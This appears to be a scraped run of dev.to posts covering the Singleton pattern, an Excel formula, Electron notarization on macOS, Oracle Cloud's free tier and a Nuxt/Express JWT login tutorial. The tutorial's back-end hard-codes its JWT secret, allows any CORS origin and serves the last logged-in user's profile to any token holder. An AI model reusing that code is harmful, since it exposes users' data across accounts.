- It's hard to unit test because it's gonna be hard to mock the Singleton due to its constructor being private.
## Conclusion
The Singleton pattern is a controversial one: some say it's good, others say it's bad.
It depends actually, in some rare use-cases it can be very useful, and now you have this pattern in your toolbox.
**Today you learned:**
- Core concepts of the Singleton pattern
- Its basic implementation
- Its pros and cons
## Further Readings
If you want to learn more about the design patterns, I would recommend [Diving into Design Patterns](https://refactoring.guru/design-patterns). It explains all 23 design patterns found in the GoF book, in a fun and engaging manner.
Another book that I recommend is [Heads First Design Patterns: A Brain-Friendly Guide](https://www.amazon.com/Head-First-Design-Patterns-Brain-Friendly/dp/0596007124), which has fun and easy-to-read explanations. | tamerlang |
754,558 | Excel Formulas to Find the First Column Number in a Range ~ Easily!! | So far we have learned the formulas to find the address of the first cell in Excel. Likewise, here we... | 0 | 2021-07-13T03:22:29 | https://geekexcel.com/excel-formulas-to-find-the-first-column-number-in-a-range/ | excelformula, excelformulas | ---
title: Excel Formulas to Find the First Column Number in a Range ~ Easily!!
published: true
date: 2021-07-09 08:19:25 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-find-the-first-column-number-in-a-range/
---
So far we have learned the formulas to find the **[address of the first cell in Excel](https://geekexcel.com/excel-formulas-to-find-the-address-of-first-cell-in-a-range/)**. Likewise, here we will show the formulas to **find the first column number in a range in Excel**. Let’s see them below!! Get an official version of **MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
*The first column number in a range*
## Generic Formula:
- If you want to return the first column number, you can use the below formula.
**=[MIN](https://geekexcel.com/how-to-use-excel-min-function-in-office-365-with-examples/)([COLUMN](https://geekexcel.com/use-column-function-in-microsoft-excel-365-simple-methods/)(range))**
## Syntax Explanations:
- **MIN** – In Excel, the [**MIN function**](https://geekexcel.com/how-to-use-excel-min-function-in-office-365-with-examples/) will return the smallest numeric value from the range of input values.
- **COLUMN** – This function is used to return column numbers for reference. Read more on the **[COLUMN Function](https://geekexcel.com/use-column-function-in-microsoft-excel-365-simple-methods/)**.
- **Range** – It represents the input range.
- **Comma symbol (,)** – It is a separator that helps to separate a list of values.
- **Parenthesis ()** – The main purpose of this symbol is to group the elements.
## Practical Example:
Let’s consider the below example image.
- Here we will enter the input values in **Column B** , and **Column C**.
- Now we are going to find the first column number in a range.
*Input Ranges*
- Select any cell and type the above-given formula.
*Enter the formula*
- Finally, press **ENTER** key, you can get the result as shown below.
*Result*
## Closure:
In this chapter, we have described the simple formulas to **get the first column number** (i.e. the starting column number) in a range in Excel. Hope this article is useful to you. Leave a **comment** or **reply** below to let me know what you think!
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)**!! If you want to learn more helpful formulas, check out **[Excel Formulas](https://geekexcel.com/excel-formula/)**!!
### Read Ahead:
- **[Excel Formulas to Find First Match between Two Ranges ~ Quick Tricks!!](https://geekexcel.com/excel-formulas-to-find-first-match-between-two-ranges/)**
- **[How to Insert a Date or Formatted Date in Excel Office 365?](https://geekexcel.com/how-to-insert-a-date-or-formatted-date-in-excel-office-365/)**
- **[Excel Formulas to Add Row Numbers and Skip Blanks ~ Simple Guide!!](https://geekexcel.com/excel-formulas-to-add-row-numbers-and-skip-blanks-simple-guide/)**
- **[Excel Formulas to Find the Last Cell Address in a Range ~ Quick Tricks!!](https://geekexcel.com/excel-formulas-find-last-cell-address/)**
| excelgeek |
754,585 | Starting a YouTube Channel for Programming Tutorials! | I have created a YouTube Channel in Which I will be Uploading Tutorials Related to the Programming... | 0 | 2021-07-09T10:16:31 | https://dev.to/abdurrkhalid333/starting-a-youtube-channel-for-programming-tutorials-5gmf | webdev, productivity, html, showdev | I have created a YouTube Channel in Which I will be Uploading Tutorials Related to the Programming and Web Development.
YouTube Channel Link:
[Learn To Code](https://www.youtube.com/channel/UChtr70R5H_ziehe_YjtOJtw 'Learn To Code')
If You Use Facebook then it will be a good option to like the Page so that you can get Notifications Regarding the Next Tutorial Updates.
[Learn To Code on Facebook](https://www.facebook.com/LearnToBeProgrammer/ 'Learn to Code Facebook Page')
Any Kind of Suggestion is Welcome.
Have a Happy Week-End Ahead.
| abdurrkhalid333 |
754,607 | Making notarization work on macOS for Electron apps built with Electron Builder | I ❤️ building things and, when it comes to software, I’ve done that for quite a few platforms and in... | 0 | 2021-07-09T12:45:12 | https://christarnowski.com/making-notarization-work-on-macos-for-electron-apps-built-with-electron-builder | development, electron, node | I ❤️ building things and, when it comes to software, I’ve done that for quite a few platforms and in various programming languages over the years. Recently I’ve been developing a desktop app built with Electron and I must say the whole first-timer experience has been rather pleasing. One thing that required “a bit” of attention was the build process for different platforms (Windows, macOS) and part of it was the app notarization step on macOS. What on paper looked like a really easy thing to do, took me a couple of hours and a lot of detective work to get it right 🕵️♀️.
Below is a **step by step guide on how to set up notarization on macOS** when using [Electron Builder](http://electron.build) (22.7.0) and [Electron Notarize](https://github.com/electron/electron-notarize) (1.0.0), including a complete workaround for an issue I’ve experienced that has to do with Apple Notarization Service. Hopefully, I will be able to help you out like a true superhero 🦸🏻♂️, so your time and effort can be devoted to other, more pressing matters 🦾.
## A bit of context
Want the solution right away 🧐? Skip to the step by step guide.
Why even bother with notarization in the first place? Well, on macOS (and Windows for that matter) there are various security mechanisms built into the operating system to prevent malicious software from being installed and run on a machine. macOS and Windows both require installers and binaries to be cryptographically signed with a valid certificate. On macOS, however, there is an additional build-time notarization step that involves sending a compressed .app archive to Apple’s Notarization Service (ANS) for verification.
In most instances, the whole process is painless, but in my case, i.e. an Electron app with a lot of dependencies and third-party binaries, not so much 🤕. It turns out the ANS expects the ZIP archive of the `.app` package to be compressed using the PKZIP 2.0 scheme, while the default zip utility, shipped with macOS and used by Electron Notarize, features version 3.0 of the generic ZIP algorithm. There are some notable differences between the two and to see what I mean, try manually signing the `.app`, then compressing it using:
1. Command-line `zip` utility,
2. “Compress” option found in Finder,
And submitting it for notarization from the command line. The Finder-created archive will pass, while the zip one will fail.
The `zipinfo` command line tool reveals that:
* Finder uses the PKZIP 2.0 scheme, while `zip` uses version 3.0 of the generic ZIP algorithm.
* Finder compresses all the files in `.app` as binaries, while `zip` treats files according to the content type (code as text, binaries as binaries).
* Finder includes magical `__MACOSX` folders to embed macOS-specific attributes into the archive, especially for links to dynamic libraries (e.g. found in some Node modules).
One way of getting around the above issue is to use `ditto` instead of `zip` to create a compressed archive of an `.app` package. [Ditto](https://ss64.com/osx/ditto.htm) is a command line tool shipped with macOS for copying directories and creating/extracting archives. It uses the same scheme as Finder (PKZIP) and preserves metadata, thus making the output compatible with Apple’s service. The relevant options for executing `ditto` in this context, i.e. to mimic Finder’s behavior, are:
* `-c` and `-k` to create a PKZIP-compressed archive,
* `--sequesterRsrc` to preserve metadata (`__MACOSX`),
* `--keepParent` to embed the parent directory name in the archive.
The complete invocation looks as follows:
```
ditto -c -k --sequesterRsrc --keepParent APP_NAME.app APP_NAME.app.zip
```
To apply this to Electron Builder’s notarization flow, you need to monkey patch Electron Notarize and make the compression step use `ditto`. This can be done via the `afterSign` hook defined in Electron Builder’s configuration file.
You can learn in a [follow-up essay](https://christarnowski.com/blog/making-notarization-work-on-macos-for-electron-apps-built-with-electron-builder) why I chose this particular approach. Hope you love it!
## Setting up macOS app notarization, including workaround
Before you start, you first need to properly configure [code signing](https://developer.apple.com/developer-id), as per the [official documentation of Electron Builder](https://www.electron.build/code-signing) and various guides¹. For completeness’ sake I’ve included here all the steps required for making notarization work, based on my experience and the excellent work of other developers¹.
1. [Create an app-specific password](https://support.apple.com/en-us/HT204397) to use with Apple notarization service. Preferably using your organization’s developer Apple ID.
2. Create an Entitlements `.plist` file specific to your Electron apps. In our case, the following did the trick (`entitlements.mac.plist`):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<!-- https://github.com/electron/electron-notarize#prerequisites -->
<key>com.apple.security.cs.allow-jit</key>
<true/>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key>
<true/>
<key>com.apple.security.cs.allow-dyld-environment-variables</key>
<true/>
<!-- https://github.com/electron-userland/electron-builder/issues/3940 -->
<key>com.apple.security.cs.disable-library-validation</key>
<true/>
</dict>
</plist>
```
3. Set the `entitlements` and `entitlementsInherit` options for the macOS build in Electron Builder’s configuration file to the `.plist` created in the previous step.
4. Create a `notarize.js` script to execute after Electron Builder signs the `.app` and its contents. Place the file in the build directory defined in Electron Builder’s configuration file.
```javascript
const {notarize} = require("electron-notarize");
exports.default = async function notarizing(context) {
const {electronPlatformName, appOutDir} = context;
if (electronPlatformName !== "darwin") {
return;
}
const appName = context.packager.appInfo.productFilename;
return await notarize({
appBundleId: process.env.APP_BUNDLE_ID,
appPath: `${appOutDir}/${appName}.app`,
appleId: process.env.APPLE_ID,
appleIdPassword: process.env.APPLE_ID_PASSWORD,
});
};
```
5. Add `"afterSign": "./PATH_TO_NOTARIZE_JS_IN_BUILD_DIRECTORY"` to Electron Builder’s configuration file.
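Putting steps 3 and 5 together, the relevant fragment of an Electron Builder JSON configuration might look like the sketch below. Note that the paths and the `hardenedRuntime` flag are illustrative assumptions, not values taken verbatim from my project:

```json
{
  "mac": {
    "hardenedRuntime": true,
    "entitlements": "build/entitlements.mac.plist",
    "entitlementsInherit": "build/entitlements.mac.plist"
  },
  "afterSign": "build/notarize.js"
}
```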
6. Monkey patch Electron Notarize. The script should run before Electron Builder’s CLI command. In our case, since we’ve taken a very modular approach to general app architecture, the build scripts (TypeScript files) include a separate `commons` module, which is imported by Electron Notarize patcher. The `.ts` files can be executed using `ts-node` via
```
ts-node -O {\"module\":\"CommonJS\"} scripts/patch-electron-notarize.ts
```
The patcher itself does one thing only, that is, it replaces the following piece of the code in `build/node_modules/electron-notarize/lib/index.js`:
```javascript
spawn('zip', ['-r', '-y', zipPath, path.basename(opts.appPath)]
```
with
```javascript
spawn('ditto', ['-c', '-k', '--sequesterRsrc', '--keepParent', path.basename(opts.appPath), zipPath]
```
Our code for the `commons` (`patcher-commons.ts`):
```typescript
import {promises as fsp} from "fs";
export type FileContentsTransformer = (content: string) => string;
export async function replaceFileContents(path: string, transformer: FileContentsTransformer) {
let fh: fsp.FileHandle | null = null;
let content: string = "";
try {
fh = await fsp.open(path, "r");
if (fh) {
content = (await fh.readFile()).toString();
}
} finally {
if (fh) {
await fh.close();
}
}
try {
fh = await fsp.open(path, "w");
if (fh) {
await fh.writeFile(transformer(content));
}
} finally {
if (fh) {
await fh.close();
}
}
}
```
and the patcher (`patch-electron-notarize.ts`):
```typescript
import {FileContentsTransformer, replaceFileContents} from "./patcher-commons";
const ELECTRON_NOTARIZE_INDEX_PATH = "build/node_modules/electron-notarize/lib/index.js";
async function main() {
const transformer: FileContentsTransformer = (content: string) => {
return content.replace(
"spawn('zip', ['-r', '-y', zipPath, path.basename(opts.appPath)]",
"spawn('ditto', ['-c', '-k', '--sequesterRsrc', '--keepParent', path.basename(opts.appPath), zipPath]"
);
};
await replaceFileContents(ELECTRON_NOTARIZE_INDEX_PATH, transformer);
}
// noinspection JSIgnoredPromiseFromCall
main();
```
7. Set `APPLE_ID` and `APPLE_ID_PASSWORD` environment variables (the ones defined in Step 1) before running Electron Builder on your developer machine or in your CI environment. You can use Keychain on your local machine instead.
And that’s pretty much it. You can check out a [simple, working example](https://github.com/christarnowski/electron-builder-notarization-for-macos-example) to see how to put this all together. Now you can spend the extra time on something you enjoy doing 🏖!
## Three takeaways
1. **When stuck, look for the root cause in the least expected places**. In the case of my project, the compression step was the unexpected culprit.
2. **Be stubborn when a particular feature or bugfix is essential to a product’s success**. Here, the notarization was important and it took some time to get it right, but the end result is customers feeling safe when installing the software.
3. **Sometimes “working” is good enough**. I could develop a better solution, but that would take some precious time. I opted to focus on more pressing issues instead.
Feedback and questions are more than welcome, either in comments or on social media 🙂
Thanks a ton to Piotr Tomiak ([@PiotrTomiak](https://twitter.com/PiotrTomiak)) and Jakub Tomanik ([@jakub_tomanik](https://twitter.com/jakub_tomanik)) for reading drafts of this article.
## References
1. Relevant source: https://medium.com/@TwitterArchiveEraser/notarize-electron-apps-7a5f988406db.
2. GitHub Gists of the complete code. | christarnowski |
754,624 | Oracle Cloud, Free (Almost) Forever. | Have you heard? Oracle has a Cloud service like AWS, Azure, or GCP. I certainly didn't know about... | 0 | 2021-07-10T14:24:45 | https://dev.to/muckitymuck/oracle-cloud-free-almost-forever-2odo | cloudskills, cloud, cloudnative | Have you heard? Oracle has a Cloud service like AWS, Azure, or GCP. I certainly didn't know about this. IBM apparently has an offering. The field is getting crowded.(Clouded?, Clowded?)
Why should you care? A quick search for remote Oracle Cloud jobs brings up 2,000+ results on Dice. That's more than any of the big 3 with the remote-only filter applied.

Clearly, there is demand even if they are the wallflower at the party.
How do they sweeten the deal? They have a free tier dubbed Always Free, which includes some offerings for VM instances. Pretty sweet.
Check out this clever fella and how he scored an impressive VM:

There are restrictions on how to get one. Most are only 1 core and offer only small storage. But keep an eye out:

In addition, you get $300 of credit to experiment with. Also, a lot of deployments are automated. There is a Jenkins CI/CD rollout that goes super smoothly:


What you end up with is a pretty neat dashboard with Terraform configs and settings already in place.

Speaking of Terraform, you are probably wondering what the free tier offers, in summary:

That's right: 2 VMs and managed Terraform. If you were looking to add that to your resume, this is a damn good start. DevOps is hot right now, so here is step one.
Oracle has some impressive offerings for being as relatively unknown as they are. If you have spare cycles and want a free hobby machine hosted in the cloud, this is a generous opportunity.
| muckitymuck |
754,663 | Developing Next-gen WordPress Solutions That Drive Growth & Generate Revenue | Hire our developers today to build an intuitive and scalable solution that will automate and simplify... | 0 | 2021-07-09T12:36:20 | https://dev.to/vmjsoftware/developing-next-gen-wordpress-solutions-that-drive-growth-generate-revenue-2m13 | wordpress, wordpressdevelopment, wordpressagency, wordpressservices | Hire our developers today to build an intuitive and scalable solution that will automate and simplify your mundane tasks. Share with us your vision and we will be happy to help. | vmjsoftware |
754,704 | Nuxt.js 2 And Express.js Authentication with Auth Module and JWT | Hi, today we want to build an authentication app with Nuxt.js and Express.js, we'll focus on the... | 0 | 2021-07-09T14:17:06 | https://dev.to/mohammadali0120/nuxt-js-and-express-js-authentication-with-auth-module-and-jwt-26gp | nuxt, express, authmodule, jwt | Hi, today we want to build an authentication app with Nuxt.js and Express.js, we'll focus on the front-end, and nuxt auth module and we will make a `local` authentication.
I remember myself when i wanted to add authentication in the app and how I was stuck in it because I couldn't find a good resource for it.
so I decided to write this article for other people to use it and don't get in trouble like me
This article is made for full-stack developers and also front-end developers so if you're not a full-stack web developer don't worry I will explain everything that you can add authentication on your app
**This application's back-end does not support refresh tokens. The front-end supports them, but that code is commented out because the back-end doesn't issue a refresh token, and enabling it on the front-end alone would produce an error. In other words, the back-end works with access tokens only. If you want refresh tokens too, please pay attention to the last lines of this post.**
Before we start, I should say that you need to know these technologies:
###### Vue & Nuxt.js
###### Express.js & Mongodb (If you want also implement API)
So let's start!
## Nuxt.js
1- make a new app with `npx create-nuxt-app front`
2- choose the Axios module when creating the app (if you didn't, don't worry, we will install it later)
3- install the Nuxt auth module, and Axios if you didn't add it earlier:
`yarn add --exact @nuxtjs/auth-next`
`yarn add @nuxtjs/axios`
or with npm
`npm install --save-exact @nuxtjs/auth-next`
`npm install @nuxtjs/axios`
then add them to `nuxt.config.js` like below:
```javascript
{
  modules: [
    '@nuxtjs/axios',
    '@nuxtjs/auth-next'
  ],
  auth: {
    // Options
  }
}
```
Now it's time to add options to the auth module:
```javascript
auth: {
  strategies: {
    local: {
      // scheme: "refresh",
      token: {
        property: "token", // property name that the back-end sends as the access token, saved in localStorage and in a cookie in the user's browser
        global: true,
        required: true,
        type: "Bearer"
      },
      user: {
        property: "user",
        autoFetch: true
      },
      // refreshToken: { // sends a request automatically when the access token expires; the expiry time is set on the back-end and does not need to be set here
      //   property: "refresh_token", // property name that the back-end sends as the refresh token, saved in localStorage and in a cookie in the user's browser
      //   data: "refresh_token", // data can be used to set the name of the property you want to send in the request.
      // },
      endpoints: {
        login: { url: "/api/auth/login", method: "post" },
        // refresh: { url: "/api/auth/refresh-token", method: "post" },
        logout: false, // we don't have a logout endpoint in our API; we just remove the token from localStorage
        user: { url: "/api/auth/user", method: "get" }
      }
    }
  }
},
```
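For reference, the `property` values in the config above must match the shape of the JSON your API returns. With this setup (and the Express API built later in this article), the login and user endpoints are expected to respond with payloads shaped like this — the field values below are just placeholders:

```javascript
// Expected response of POST /api/auth/login — the auth module reads the `token` property
const loginResponse = { token: "eyJhbGciOiJIUzI1NiIs..." };

// Expected response of GET /api/auth/user — the auth module reads the `user` property
const userResponse = {
  user: { id: 1, fullname: "John Doe", email: "john@example.com" },
};
```

If your API nests these differently (e.g. `data.token`), adjust the `property` fields accordingly.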
and here is the config for Axios that I recommend using:
```javascript
axios: {
  baseURL: "http://localhost:8080" // set your API URL here
},
```
**Tip:** if your back-end has implemented refresh tokens, you should uncomment the `refresh` endpoint and change it to the endpoint your back-end exposes, and also uncomment the `refreshToken` object and `scheme: "refresh"`.
Now we make some components:
`/components/Auth/Login/index.vue`
```javascript
<template>
<div>
<form @submit.prevent="login">
<div class="mb-3">
<label for="email" class="form-label">Email address</label>
<input
type="email"
class="form-control"
id="email"
v-model="loginData.email"
aria-describedby="emailHelp"
/>
</div>
<div class="mb-3">
<label for="password" class="form-label">Password</label>
<input
type="password"
v-model="loginData.password"
class="form-control"
id="password"
/>
</div>
<button type="submit" class="btn btn-primary w-100">login</button>
</form>
</div>
</template>
<script>
export default {
data() {
return {
loginData: {
email: "",
password: ""
}
};
},
methods: {
async login() {
try {
let response = await this.$auth.loginWith("local", {
data: this.loginData
});
this.$router.push("/");
console.log(response);
} catch (err) {
console.log(err);
}
}
}
};
</script>
<style></style>
```
`/components/Auth/Register/index.vue`
```javascript
<template>
<div>
<form @submit.prevent="register">
<div class="mb-3">
<label for="fullname" class="form-label">Full Name</label>
<input
type="text"
v-model="registerData.fullname"
class="form-control"
id="fullname"
/>
</div>
<div class="mb-3">
<label for="email" class="form-label">Email address</label>
<input
type="email"
class="form-control"
id="email"
v-model="registerData.email"
aria-describedby="emailHelp"
/>
</div>
<div class="mb-3">
<label for="password" class="form-label">Password</label>
<input
type="password"
v-model="registerData.password"
class="form-control"
id="password"
/>
</div>
<button type="submit" class="btn btn-primary w-100">Register</button>
</form>
</div>
</template>
<script>
export default {
data() {
return {
registerData: {
fullname: "",
email: "",
password: ""
}
};
},
methods: {
async register() {
try {
const user = await this.$axios.$post("/api/auth/signin", {
fullname: this.registerData.fullname,
email: this.registerData.email,
password: this.registerData.password
});
console.log(user);
} catch (err) {
console.log(err);
}
}
}
};
</script>
<style></style>
```
and
`/components/Home/index.vue`
```javascript
<template>
<div>
<h2>You're in home page</h2>
</div>
</template>
<script>
export default {};
</script>
<style></style>
```
and
`/components/User/index.vue`
```javascript
<template>
<div>
Hello dear <b style="color:red">{{ getUserInfo.fullname }}</b> you're in
profile page
<hr />
This is your information:
<br /><br />
<table class="table">
<thead>
<tr>
<th scope="col">ID</th>
<th scope="col">FullName</th>
<th scope="col">Email</th>
</tr>
</thead>
<tbody>
<tr>
<td>{{ getUserInfo.id }}</td>
<td>{{ getUserInfo.fullname }}</td>
<td>{{ getUserInfo.email }}</td>
</tr>
</tbody>
</table>
</div>
</template>
<script>
export default {
computed: {
getUserInfo() {
return this.$store.getters.getUserInfo;
}
}
};
</script>
<style></style>
```
and
`/components/Layouts/Header/index.vue`
```javascript
<template>
<div>
<nav class="navbar navbar-expand-lg navbar-light bg-light">
<div class="container-fluid">
<nuxt-link class="navbar-brand" to="/">Navbar</nuxt-link>
<button
class="navbar-toggler"
type="button"
data-bs-toggle="collapse"
data-bs-target="#navbarSupportedContent"
aria-controls="navbarSupportedContent"
aria-expanded="false"
aria-label="Toggle navigation"
>
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav me-auto mb-2 mb-lg-0">
<template v-if="!isAuthenticated">
<li class="nav-item">
<nuxt-link
class="nav-link active"
aria-current="page"
to="/auth/login"
>Login</nuxt-link
>
</li>
<li class="nav-item">
<nuxt-link
class="nav-link active"
aria-current="page"
to="/auth/register"
>Register</nuxt-link
>
</li>
</template>
<template v-else>
<li class="nav-item" @click="logout">
<nuxt-link class="nav-link active" aria-current="page" to="#"
>Logout</nuxt-link
>
</li>
<li>
<nuxt-link
class="nav-link active"
aria-current="page"
to="/profile"
>
Profile
</nuxt-link>
</li>
</template>
</ul>
</div>
</div>
</nav>
</div>
</template>
<script>
export default {
methods: {
async logout() {
await this.$auth.logout(); // this method logs the user out and sets the token to false in the localStorage of the user's browser
}
},
computed: {
isAuthenticated() {
return this.$store.getters.isAuthenticated; // it checks whether the user is authenticated
}
}
};
</script>
<style></style>
```
and
`/layouts/default.vue`
```javascript
<template>
<div>
<layouts-header />
<div class="container">
<br />
<Nuxt />
</div>
</div>
</template>
<script>
export default {};
</script>
<style>
@import url("https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.0.2/css/bootstrap.min.css");
</style>
```
and
`/pages/index.vue`
```javascript
<template>
<div>
<home />
</div>
</template>
<script>
export default {};
</script>
```
and
`/pages/auth/login/index.vue`
```javascript
<template>
<div>
<auth-login />
</div>
</template>
<script>
export default {};
</script>
<style></style>
```
and
`/pages/auth/register/index.vue`
```javascript
<template>
<div>
<auth-register />
</div>
</template>
<script>
export default {};
</script>
<style></style>
```
and
`/pages/profile/index.vue`
```javascript
<template>
<div>
<user />
</div>
</template>
<script>
export default {
middleware: "isAuthenticated" // it will use `isAuthenticated` middleware
};
</script>
<style></style>
```
and a middleware (`/middleware/isAuthenticated.js`) for checking whether the user is authenticated:
```javascript
export default function({ store, redirect }) {
  if (!store.state.auth.loggedIn) {
    return redirect("/auth/login");
  }
}
```
and at last, the Vuex store:
```javascript
export const getters = {
  isAuthenticated(state) {
    return state.auth.loggedIn; // the auth object is added to the Vuex state by default when you initialize nuxt auth
  },
  getUserInfo(state) {
    return state.auth.user;
  }
};
```
## Express.js
That was our Nuxt code, and now it's time to make our API.
First of all, make a directory, enter it, and run this command in your Terminal/Cmd: `npm init -y`
then `npm install express body-parser bcryptjs jsonwebtoken mongoose`
and then
`npm install --save-dev nodemon`, which adds nodemon as a dev dependency
##### Caution: if `"main"` is set like this, `"main": "index.js"`, in the `package.json` file, change it to `"main": "app.js"`
Now it's time to create some files:
`nodemon.json in the root directory that you just made` (replace the values with your own MongoDB cluster user, password, and database name; note that JSON does not allow comments)

```json
{
  "env": {
    "MONGO_USER": "mohammadali",
    "MONGO_PASS": "20212021",
    "MONGO_DB": "auth"
  }
}
```
`In package.json, which is in the root directory, add these lines to scripts as I did below`

```javascript
"scripts": {
  "test": "echo \"Error: no test specified\" && exit 1",
  "start-server": "node app.js",
  "dev": "nodemon app.js"
},
```
`app.js in the root directory that you just made`
```javascript
const express = require("express");
const bodyParser = require("body-parser");
const mongoose = require("mongoose");

// routes
const authRouter = require("./routes/authRouter");

const app = express();

app.use(bodyParser.json());

app.use((req, res, next) => {
  res.setHeader("Access-Control-Allow-Origin", "*");
  res.setHeader(
    "Access-Control-Allow-Methods",
    "OPTIONS, GET, POST, PUT, PATCH, DELETE"
  );
  res.setHeader("Access-Control-Allow-Headers", "Content-Type, Authorization");
  next();
});

app.use("/api/auth/", authRouter);

app.use((error, req, res, next) => {
  console.log(error);
  const status = error.statusCode || 500;
  const message = error.message;
  const data = error.data;
  res.status(status).json({ message: message, data: data });
});

// connect to db
const MONGOOSE_URI = `mongodb+srv://${process.env.MONGO_USER}:${process.env.MONGO_PASS}@cluster0.4r3gv.mongodb.net/${process.env.MONGO_DB}`;

mongoose
  .connect(MONGOOSE_URI)
  .then((result) => {
    app.listen(process.env.PORT || 8080);
  })
  .catch((err) => console.log(err));
```
and
`/controllers/authController.js`
```javascript
const bcrypt = require("bcryptjs");
const jwt = require("jsonwebtoken");

const userModel = require("../models/userModel");

exports.postSignin = async (req, res, next) => {
  const { fullname, email, password } = req.body;
  try {
    const existingUser = await userModel.findOne({ email: email });
    if (existingUser) {
      const error = new Error(
        "Email already exists, please pick another email!"
      );
      error.statusCode = 409;
      throw error; // the error-handling middleware in app.js sends the 409 response
    }
    const hashedPassword = await bcrypt.hash(password, 12);
    const user = new userModel({
      fullname: fullname,
      email: email,
      password: hashedPassword,
    });
    const result = await user.save();
    res.status(200).json({
      message: "User created",
      user: { id: result._id, email: result.email },
    });
  } catch (err) {
    if (!err.statusCode) {
      err.statusCode = 500;
    }
    next(err);
  }
};

// NOTE: module-level state like this only works for a single-user demo;
// in a real app you would load the user from the verified token on each request
let loadedUser;

exports.postLogin = async (req, res, next) => {
  const { email, password } = req.body;
  try {
    const user = await userModel.findOne({ email: email });
    if (!user) {
      const error = new Error("user with this email not found!");
      error.statusCode = 401;
      throw error;
    }
    loadedUser = user;
    // bcrypt.compare returns a Promise, so it must be awaited
    const passwordsMatch = await bcrypt.compare(password, user.password);
    if (!passwordsMatch) {
      const error = new Error("password does not match!");
      error.statusCode = 401;
      throw error;
    }
    const token = jwt.sign({ email: loadedUser.email }, "expressnuxtsecret", {
      expiresIn: "20m", // the token expires after 20 minutes; if the user refreshes the page after that, they will be logged out
    });
    res.status(200).json({ token: token });
  } catch (err) {
    if (!err.statusCode) {
      err.statusCode = 500;
    }
    next(err);
  }
};

// sends the user data to the front-end; as mentioned above, `autoFetch` in the `user` object of nuxt.config.js makes the auth module call this endpoint
exports.getUser = (req, res, next) => {
  res.status(200).json({
    user: {
      id: loadedUser._id,
      fullname: loadedUser.fullname,
      email: loadedUser.email,
    },
  });
};
```
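One subtle pitfall in a controller like this: `bcrypt.compare` returns a Promise, so its result must be `await`ed. If the `await` is forgotten, the "wrong password" branch can never run, because a Promise object is always truthy — even one that resolves to `false`. Plain JavaScript makes this easy to see:

```javascript
// Stand-in for calling bcrypt.compare(...) without await:
const comparePassword = Promise.resolve(false);

if (!comparePassword) {
  console.log("this branch never runs"); // a Promise object is truthy
}
console.log(Boolean(comparePassword)); // true

// The fix: await the Promise to get the real boolean
(async () => {
  const result = await comparePassword;
  console.log(result); // false
})();
```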
and
`/middleware/isAuth.js`
```javascript
const jwt = require("jsonwebtoken");

module.exports = (req, res, next) => {
  const authHeader = req.get("Authorization");
  if (!authHeader) {
    const error = new Error("Not authenticated.");
    error.statusCode = 401;
    throw error;
  }
  const token = authHeader.split(" ")[1];
  let decodedToken;
  try {
    decodedToken = jwt.verify(token, "expressnuxtsecret");
  } catch (err) {
    err.statusCode = 500;
    throw err;
  }
  if (!decodedToken) {
    const error = new Error("Not authenticated.");
    error.statusCode = 401;
    throw error;
  }
  req.userEmail = decodedToken.email; // the token payload only contains the email (see postLogin)
  next();
};
```
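A side note on the `authHeader.split(" ")[1]` line: the client sends the header as `Authorization: Bearer <token>`, so splitting on the space yields the raw token. A JWT itself is three base64url-encoded segments joined by dots, and the middle segment (the payload) can be decoded by anyone without the secret — which is why you should never put sensitive data in it. A small sketch with a made-up token (this is decoding, not verification):

```javascript
const authHeader = "Bearer xxxxx.eyJlbWFpbCI6ImFAYi5jIn0.yyyyy";

// "Bearer <token>" -> take the part after the space
const token = authHeader.split(" ")[1];

// header.payload.signature -> take the middle segment
const payloadSegment = token.split(".")[1];

// base64url-decode the payload (requires Node >= 15.7 for "base64url")
const payload = JSON.parse(Buffer.from(payloadSegment, "base64url").toString());
console.log(payload.email); // a@b.c
```

`jwt.verify` does this decoding too, but it additionally checks the signature and expiry, which is what actually makes the middleware safe.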
and
`/models/userModel.js`
```javascript
const mongoose = require("mongoose");

const Schema = mongoose.Schema;

const UserSchema = new Schema(
  {
    fullname: {
      type: String,
      required: true,
    },
    email: {
      type: String,
      required: true,
    },
    password: {
      type: String,
      required: true,
    },
  },
  { timestamps: true }
);

module.exports = mongoose.model("User", UserSchema);
```
and
`/routes/authRouter.js` (the filename must match the `require("./routes/authRouter")` in `app.js`)
```javascript
const express = require("express");
const router = express.Router();

const authController = require("../controllers/authController");
const isAuth = require("../middleware/isAuth");

router.post("/signin", authController.postSignin);
router.post("/login", authController.postLogin);
router.get("/user", isAuth, authController.getUser); // protected: requires a valid Bearer token

module.exports = router;
```
#### Note that this is a test project; in a real application you should add validation for inputs on both the client side and the server side.
Finally, it's done. I hope you've enjoyed it; here is my [GitHub](https://github.com/mohammadali0120/nuxt-express-authentication/) link where you can find the source code.
**Some suggestions that might be useful for you:**
For those who want both refresh and access tokens for their application and want to use PostgreSQL instead of MongoDB, I suggest **[this](https://github.com/mohammadali0120/nuxt-express-postgres-authentication)** GitHub repository.
And for those who want both refresh and access tokens, want to use PostgreSQL instead of MongoDB, and also want to use TypeScript for their back-end application, I suggest **[this](https://github.com/mohammadali0120/nuxt-express-and-typescript-postgres-authentication)** GitHub repository.
| mohammadali0120 |
754,929 | Anyone on polywork out here? | Is anyone out here on @polywork ? Polywork is an alternative to LinkedIn and honestly their... | 0 | 2021-07-09T18:13:18 | https://dev.to/mediocredevops/anyone-on-polywork-out-here-5hem | Is anyone out here on @Polywork?
Polywork is an alternative to LinkedIn and honestly their interface and UI/UX is pretty good!
My Profile is at https://www.polywork.com/afrocoder
I want to connect with new people and network and I have 10 Invite codes if anyone wants to join!
Happy weekend! | mediocredevops | |
755,393 | CRUD operation with knex & mysql in node.js | In this post I will teach you how to use mysql with knex.js 😊 Knex.js is a SQL query... | 0 | 2021-07-10T09:16:48 | https://dev.to/moniruzzamansaikat/crud-operation-with-knex-mysql-in-node-js-2c29 | node, mysql, knex, crud | ### In this post I will teach you how to use mysql with knex.js 😊###
